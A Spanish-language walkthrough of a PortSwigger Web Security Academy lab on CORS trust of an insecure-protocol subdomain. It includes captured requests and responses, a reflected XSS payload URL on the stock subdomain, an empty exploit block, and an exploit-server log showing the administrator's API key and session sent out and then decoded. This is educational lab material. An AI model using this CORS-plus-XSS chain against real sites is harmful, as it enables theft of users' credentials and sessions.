# Lab 3: CORS vulnerability with trusted insecure protocols Primero iniciamos sesion y capturamos la siguiente peticion: ``` GET /accountDetails HTTP/2 Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net Cookie: session=BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a5000120438c0d181938e1900bb00e7.web-security-academy.net/my-account?id=wiener Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i ``` La peticion previa responde asi: ``` HTTP/2 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 { "username": "wiener", "email": "", "apikey": "zZYurR0j8yVuO0G4rUgOEQ3BDPCa1k63", "sessions": [ "BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f" ] } ``` Y tambien se identifica la siguiente peticion al clickear en check stock:

La peticion es: ``` GET /?productId=1&storeId=1 HTTP/1.1 Host: stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Connection: keep-alive ``` Y la respuesta es: ``` HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Set-Cookie: session=xcDseBBRQ3hSmUgsF5uWLEusdjSmvaWk; Secure; HttpOnly; SameSite=None X-Frame-Options: SAMEORIGIN Connection: close Content-Length: 16 Stock level: 394 ``` Se puede apreciar Access-Control-Allow-Credentials: true y por lo anterior, enviamos la siguiente peticion: ``` GET /accountDetails HTTP/2 Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net Cookie: session=jv44EUnL4EjHlw0QR2FOyfIxJPWolEj3 Origin: https://exploit-0ac800cb046a13ad81b1ce40010f001a.exploit-server.net/ Pragma: no-cache Cache-Control: no-cache Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i ``` Pero no funciona: ``` HTTP/2 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 { "username": "wiener", "email": "", "apikey": "uQASsz6qb00wbSWwMYA3ssCglHbumhoP", "sessions": [ "jv44EUnL4EjHlw0QR2FOyfIxJPWolEj3" ] } ``` Por lo anterior, autorizamos el subdominio: ```bash GET /accountDetails HTTP/2 Host: 0a5000120438c0d181938e1900bb00e7.web-security-academy.net Origin: http://stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net Cookie: session=BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a5000120438c0d181938e1900bb00e7.web-security-academy.net/my-account?id=wiener Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i ``` Y con el subdominio si funciono: ```bash HTTP/2 200 OK Access-Control-Allow-Origin: http://stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net Access-Control-Allow-Credentials: true Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 149 { "username": "wiener", "email": "", "apikey": "zZYurR0j8yVuO0G4rUgOEQ3BDPCa1k63", "sessions": [ "BMGMCpBoyKZqvljTK4JLclKbfPUzUi3f" ] } ``` Y adicionalmente, se detecta que el aplicativo web stock es susceptible a ataques de XSS: {% code overflow="wrap" %} ```url http://stock.0ace001004cb5c4384df4662009c00d6.web-security-academy.net/?productId=4%3Cscript%3Ealert(2024)%3C/script%3E&storeId=1 ``` {% endcode %}

Teniendo en cuenta lo anterior, se desarrolla el siguiente exploit: ```html ``` En este escenario, el servidor web de `web-security-academy.net` está configurado para confiar en todos los subdominios sin importar el protocolo. Esto significa que cualquier subdominio bajo `web-security-academy.net`, como `stock.0a5000120438c0d181938e1900bb00e7.web-security-academy.net`, es automáticamente autorizado a realizar peticiones cross-origin a `0a5000120438c0d181938e1900bb00e7.web-security-academy.net` Y luego de lo anterior, se envia la URL del exploit server a la victima: Se recibe el siguiente Log: {% code overflow="wrap" %} ``` 10.0.4.192 2024-07-02 16:05:48 +0000 "GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22R79v19o3c806LE3uqDV6jWs3LZUDT6nE%22,%20%20%22sessions%22:%20[%20%20%20%20%22Flkp523j6bUAJX1R1BCgm7vamY3aFjc6%22%20%20]} HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" ``` {% endcode %} Al decodificar en formato URL se obtiene lo siguiente: {% code overflow="wrap" %} ```json { "username": "administrator", "email": "", "apikey": "R79v19o3c806LE3uqDV6jWs3LZUDT6nE", "sessions": ["Flkp523j6bUAJX1R1BCgm7vamY3aFjc6"] } ``` {% endcode %}